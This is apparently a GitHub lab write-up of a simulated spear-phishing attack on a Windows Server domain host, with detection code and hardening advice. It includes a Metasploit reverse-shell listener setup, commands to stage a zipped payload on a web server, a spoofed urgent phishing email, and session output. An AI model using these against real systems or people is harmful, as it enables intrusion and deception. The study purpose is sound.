GitHub: okoroe845-create/-Advanced-Spear-Phishing-Post-Exploitation-Simulation
Stars: 1 | Forks: 0
# 🎭 Full-Lifecycle Spear-Phishing & Active Directory Node Takeover
### Performed by: Okoro Francis Emmanuel
**Target Audience:** Cybersecurity Technical Reviewers & Executive Leadership
## 📌 Executive Summary & Project Overview
### High-Level Business Context
In modern corporate environments, technical defenses (firewalls, encryption, antivirus) are heavily prioritized, yet **human behavior** remains the most targeted operational vulnerability. This project demonstrates a comprehensive, full-lifecycle simulation of a targeted **Spear-Phishing Campaign** and subsequent **Post-Exploitation Command & Control (C2)** operation.
By executing both the offensive staging and simulating the internal user actions, this lab maps out how a single, high-urgency email can bypass perimeter boundaries, deceive an employee, and grant an external attacker administrative-level access to a corporate Windows Server domain asset.
### Core Objectives:
* Validate the efficacy of email security filters against targeted HTML-pretext messages.
* Analyze user vulnerability to urgent social engineering pretexts.
* Demonstrate the critical business risk of unmonitored inbound reverse TCP connections.
* Map out systematic post-exploitation host discovery workflows.
## 🛠️ Tooling & Infrastructure Breakdown
To carry out this end-to-end audit, a two-host lab (attacker machine plus target server) was configured to stand in for an enterprise environment:
| Tool / Component | Function in Project | Business / Technical Impact |
| :--- | :--- | :--- |
| **Kali Linux** | Bare-Metal Attacker Infrastructure | Dedicated security environment hosting tools and listeners. |
| **Social-Engineer Toolkit (SET)** | Spear-Phishing & Mass E-Mailer Engine | Automates attack pretexts, spoofing, and deployment targeting. |
| **Metasploit Framework (MSF)** | Command & Control (C2) Listener | Handled payload staging, reverse handshakes, and interactive shells. |
| **Apache2 Web Server** | Host Malicious Assets Locally | Served as the external file delivery system over port 80. |
| **Meterpreter** | Advanced In-Memory Payload | Evades disk signatures by running inside active RAM memory. |
| **Windows Server 2016** | Active Directory Node (`MS10`) | The target server asset within the `structurereality` domain. |
## 💻 Step-by-Step Technical Execution
The simulation was performed chronologically across four highly calculated tactical phases:
### Step 1: C2 Listener Initialization
Before any email is sent, the receiving infrastructure has to be listening. A `multi/handler` listener was configured in Metasploit to wait for the incoming callback on port `443`, chosen because outbound traffic to that port blends in with ordinary HTTPS egress (the payload itself is plain `reverse_tcp`, so only the port is borrowed, not TLS).
```console
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.1.1.66
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.1.1.66:443
```
### Step 2: Payload Staging & Server Setup
A malicious executable wrapper (`payload.exe`) was compressed into an update archive to bypass basic network firewalls scanning for raw `.exe` extensions, then moved to the web service directory.
```bash
# Enter SET's working directory, where the generated payload.exe is written
cd /root/.set
# Wrap the executable in a zip archive under the Apache document root
zip /var/www/html/acctupd.zip payload.exe
# Start the local Apache web server so the archive is reachable over port 80
service apache2 start
```
### Step 3: Spear-Phishing Attack Deployment
Using SET's automated mass mailer module, a targeted email was crafted using high-urgency pretexting to force immediate user compliance.
* **Target Destination:** `jaime@structurereality.com`
* **Spoofed From:** `support@structurereality.com` (Display: `Support Department`)
* **Subject:** `Important Account Update`
#### HTML Phishing Pretext Used:
```text
Please download, extract, and run the update file from this link: update
Otherwise, your certs will automatically expire!

Sincerely,
Support Department
```
(`update` is the hyperlink anchor text; it points at the archive served in Step 2.)
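A defensive counterpart to the pretext above, added to this write-up as example code (it is not part of the original lab and not SET or Metasploit output): a small gateway-style rule set that scores a raw message on the same traits the pretext relies on, namely a sender claiming the recipient's own domain while SPF/DMARC fail, urgency language, and a link to an archive on a bare IP address. The two sample messages, their `Received` and `Authentication-Results` header values, the phrase list and the verdict threshold are all constructed for the example.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Domain the lab's pretext impersonates (from the README); everything else below is constructed.
INTERNAL_DOMAIN = "structurereality.com"
URGENCY_PHRASES = ("automatically expire", "immediately", "within 24 hours",
                   "will be suspended", "account will be locked")
ARCHIVE_EXTENSIONS = (".zip", ".rar", ".7z", ".iso", ".img")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed raw message modelled on the Step 3 pretext. The Received and
# Authentication-Results headers are invented stand-ins for what a mail gateway stamps.
SAMPLE_PHISH = """\
Received: from relay.example.invalid ([10.1.1.66]) by mx.structurereality.com
Authentication-Results: mx.structurereality.com; spf=fail smtp.mailfrom=structurereality.com; dmarc=fail header.from=structurereality.com
From: Support Department <support@structurereality.com>
To: jaime@structurereality.com
Subject: Important Account Update
Content-Type: text/html; charset=utf-8

<html><body>
<p>Please download, extract, and run the update file from this link:
<a href="http://10.1.1.66/acctupd.zip">update</a></p>
<p>Otherwise, your certs will automatically expire!</p>
<p>Sincerely,<br>Support Department</p>
</body></html>
"""

# Constructed benign internal message used as a control.
SAMPLE_LEGIT = """\
Authentication-Results: mx.structurereality.com; spf=pass smtp.mailfrom=structurereality.com; dmarc=pass header.from=structurereality.com
From: HR <hr@structurereality.com>
To: jaime@structurereality.com
Subject: Team lunch on Friday
Content-Type: text/plain; charset=utf-8

Hi all, lunch is at noon on Friday. Details: https://intranet.structurereality.com/events
"""


def _body_text(msg):
    part = msg.get_body(preferencelist=("html", "plain"))
    return part.get_content() if part is not None else ""


def analyze(raw_message):
    """Return the findings a gateway rule set would raise for one message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []

    # 1. Internal-domain spoofing: From claims our domain but authentication failed.
    from_domain = msg["From"].addresses[0].domain.lower()
    auth = str(msg.get("Authentication-Results", "")).lower()
    if from_domain == INTERNAL_DOMAIN and ("spf=fail" in auth or "dmarc=fail" in auth):
        findings.append("spoofed-internal-sender")

    body = _body_text(msg)
    lowered = body.lower()

    # 2. Urgency pretext language in the body.
    if any(p in lowered for p in URGENCY_PHRASES):
        findings.append("urgency-pretext")

    # 3. Links to a bare IP address and/or to an archive file.
    for url in URL_RE.findall(body):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if BARE_IP_RE.match(host) and "bare-ip-link" not in findings:
            findings.append("bare-ip-link")
        if parsed.path.lower().endswith(ARCHIVE_EXTENSIONS) and "archive-link" not in findings:
            findings.append("archive-link")

    # Two independent indicators are enough to hold the message for review.
    verdict = "quarantine" if len(findings) >= 2 else "deliver"
    return {"from_domain": from_domain, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, analyze(sample))
```

The spoofing check is the one that matters most here: a message from `support@structurereality.com` to `jaime@structurereality.com` should never arrive from an external relay with failing SPF/DMARC, so enforcing DMARC `p=reject` on the internal domain removes the pretext before any keyword scoring is needed.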
### Step 4: Simulating the Victim Actions & Reconnaissance
To thoroughly map the impact, I shifted to my local Windows host and took on the role of the victim:
1. Opened the incoming phishing link via the browser.
2. Downloaded the `acctupd.zip` container from the local server (`10.1.1.66`).
3. Extracted the files and ran the payload binary.
Immediately on execution, the payload opened a reverse TCP connection back to the Metasploit handler on Kali, producing an interactive **Meterpreter shell**:
```console
[*] Sending stage (175686 bytes) to 10.1.1.2
[*] Meterpreter session 1 opened (10.1.1.66:443 -> 10.1.1.2:1687)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
```
Once inside, I executed host discovery commands to verify the depth of network access:
```console
meterpreter > sysinfo
Computer : MS10
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
Domain : structurereality
Logged On Users : 6
meterpreter > getuid
Server username: structurereality\jaime
```
## 🚨 Vulnerability & Risk Report
Below is the risk breakdown found during the audit, prioritized by operational threat level to business continuity.
### 🔴 CRITICAL — Complete Node Compromise via Untrusted Executables
* **Threat Type:** Execution of Arbitrary Unsigned Binaries
* **Technical Severity:** High (Meterpreter Access Achieved)
* **Business Impact:** High risk of data exfiltration, ransomware distribution, or complete network pivot. An outside attacker gained a footprint on domain asset `MS10` under account context `structurereality\jaime`.
### 🟡 MEDIUM — High-Urgency Email Fraud Acceptance
* **Threat Type:** Social Engineering & Impersonation Deception
* **Technical Severity:** Medium
* **Business Impact:** Bypasses mechanical security controls entirely. Lack of user awareness or internal verification policies allows outside entities to spoof trusted personnel effectively.
### 🟢 LOW — Outbound Port Egress Over Non-Standard Services
* **Threat Type:** Lax Egress Firewall Filtering
* **Technical Severity:** Low
* **Business Impact:** Internal devices are permitted to establish arbitrary outbound connections over port `443`, whether or not the traffic is actually TLS. This makes it trivial for a backdoor payload to hold a stable outbound link back to attacker infrastructure.
## 🧠 Key Lessons Learned
1. **Defense-in-Depth Is Mandatory:** Mechanical perimeters are useless if users are tricked into downloading and running programs locally. Security must exist at the endpoint level, not just the firewall.
2. **The "Human Patch" is Hardest:** Technical controls must be backed by a strong internal security posture where employees are trained to double-check strange, high-urgency notifications.
3. **Internal Telemetry Matters:** Outbound connections should be strictly limited. If a regular workstation starts making raw, non-TLS connections on port `443`, or any process outside the expected set of web clients starts talking outbound, internal security teams should be alerted immediately.
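One way to turn lesson 3 into a concrete rule, added here as example code (not part of the original lab): a detector run over Sysmon-style process-create (ID 1) and network-connect (ID 3) events that raises a high-severity alert when a binary living in a user-writable location (Downloads, Desktop, the user's Temp) initiates an outbound connection, and a medium-severity alert when a process outside a known web-client set opens a connection on port 80 or 443. The event lines, timestamps, the `Acme Tools` updater and the allowlist contents are constructed for the example; the `payload.exe` path and the `10.1.1.66:443` destination mirror the session the README shows.

```python
import json
import re

# Workstation processes expected to open outbound web-port connections.
# Constructed allowlist for this example; a real deployment derives it from fleet baselining.
EXPECTED_WEB_CLIENTS = {
    r"c:\program files\mozilla firefox\firefox.exe",
    r"c:\program files\google\chrome\application\chrome.exe",
    r"c:\program files\microsoft office\root\office16\outlook.exe",
    r"c:\windows\system32\svchost.exe",
}
# User-writable locations a phished user extracts and runs things from (the lab's
# payload.exe came out of acctupd.zip in exactly this way).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)\\", re.I)
WEB_PORTS = {80, 443}

# Constructed Sysmon-style events (ID 1 = process create, ID 3 = network connect),
# flattened to one JSON object per line as a SIEM forwarder would emit them.
SAMPLE_SYSMON = r"""
{"EventID":1,"UtcTime":"2026-01-10 09:14:02","ProcessId":4120,"Image":"C:\\Users\\jaime\\Downloads\\acctupd\\payload.exe","ParentImage":"C:\\Windows\\explorer.exe","User":"structurereality\\jaime"}
{"EventID":3,"UtcTime":"2026-01-10 09:14:03","ProcessId":4120,"Image":"C:\\Users\\jaime\\Downloads\\acctupd\\payload.exe","User":"structurereality\\jaime","Initiated":true,"DestinationIp":"10.1.1.66","DestinationPort":443}
{"EventID":3,"UtcTime":"2026-01-10 09:12:40","ProcessId":2200,"Image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","User":"structurereality\\jaime","Initiated":true,"DestinationIp":"10.1.1.66","DestinationPort":80}
{"EventID":3,"UtcTime":"2026-01-10 09:15:10","ProcessId":3080,"Image":"C:\\Program Files\\Acme Tools\\updater.exe","User":"structurereality\\jaime","Initiated":true,"DestinationIp":"203.0.113.20","DestinationPort":443}
{"EventID":3,"UtcTime":"2026-01-10 09:15:12","ProcessId":1012,"Image":"C:\\Windows\\System32\\svchost.exe","User":"NT AUTHORITY\\SYSTEM","Initiated":true,"DestinationIp":"203.0.113.5","DestinationPort":443}
"""


def load_events(text):
    """Parse one JSON event per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return the alerts a SOC should see for the outbound connections in `events`."""
    # Index process-create events so a network alert can be enriched with its parent.
    creations = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    alerts = []
    for e in events:
        if e["EventID"] != 3 or not e.get("Initiated", False):
            continue  # only outbound (initiated) connections are of interest here
        image = e["Image"]
        if USER_WRITABLE.search(image):
            severity, reason = "high", "outbound connection from binary in user-writable path"
        elif e["DestinationPort"] in WEB_PORTS and image.lower() not in EXPECTED_WEB_CLIENTS:
            severity, reason = "medium", "web-port egress from process outside the expected client set"
        else:
            continue
        parent = creations.get(e["ProcessId"], {}).get("ParentImage", "unknown")
        alerts.append({
            "severity": severity, "reason": reason, "time": e.get("UtcTime"),
            "user": e.get("User"), "image": image, "parent": parent,
            "destination": f'{e["DestinationIp"]}:{e["DestinationPort"]}',
        })
    return alerts


if __name__ == "__main__":
    for a in detect(load_events(SAMPLE_SYSMON)):
        print(a["severity"].upper(), a["image"], "->", a["destination"], "|", a["reason"])
```

The browser fetching `acctupd.zip` over port 80 is deliberately not alerted on: it is an allowlisted client doing what browsers do. The signal worth paging on is the extracted binary under `Downloads` calling out on its own, which is exactly the event the Meterpreter session above generated.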
## 🚀 Forward Strategic Roadmap
This offensive simulation forms the foundation for three follow-up phases:
### Phase 1 — Exploitation Expansion
* Leverage the existing `structurereality\jaime` session footprint to test local permission limits.
* Attempt internal credential harvesting to see if higher administrative domain tokens are exposed in memory.
### Phase 2 — System Hardening & Controls Remediation
* **AppLocker Policy Integration:** Configure application control rules so users cannot launch unknown, unsigned software from user-writable locations such as browser download and temporary directories.
* **Egress Traffic Restrictions:** Restrict corporate devices so they can only connect outward to known, trusted web domains, crippling unauthorized reverse TCP links.
### Phase 3 — Continuous Security Pipeline Training
* Progressing through the **TryHackMe Jr. Penetration Tester** path.
* Building out hands-on offensive and defensive infrastructure as a part of a dedicated **eJPT / OSCP** study plan.
Network & Offensive Security Portfolio • 2026